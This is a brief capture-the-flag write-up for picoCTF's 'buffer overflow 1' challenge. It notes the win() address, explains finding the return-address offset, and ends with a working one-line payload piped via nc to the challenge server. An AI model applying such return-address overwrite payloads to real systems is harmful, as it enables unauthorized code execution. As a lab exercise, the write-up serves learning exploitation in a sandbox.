buffer overflow 1

objdump tells addr of win() is 0x080491f6

Trying different length of inputs more than 32 bytes helped to pinpoint where the return address (which is printed by the program) starts

python3 -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\xf6\x91\x04\x08\n")' | nc saturn.picoctf.net 58700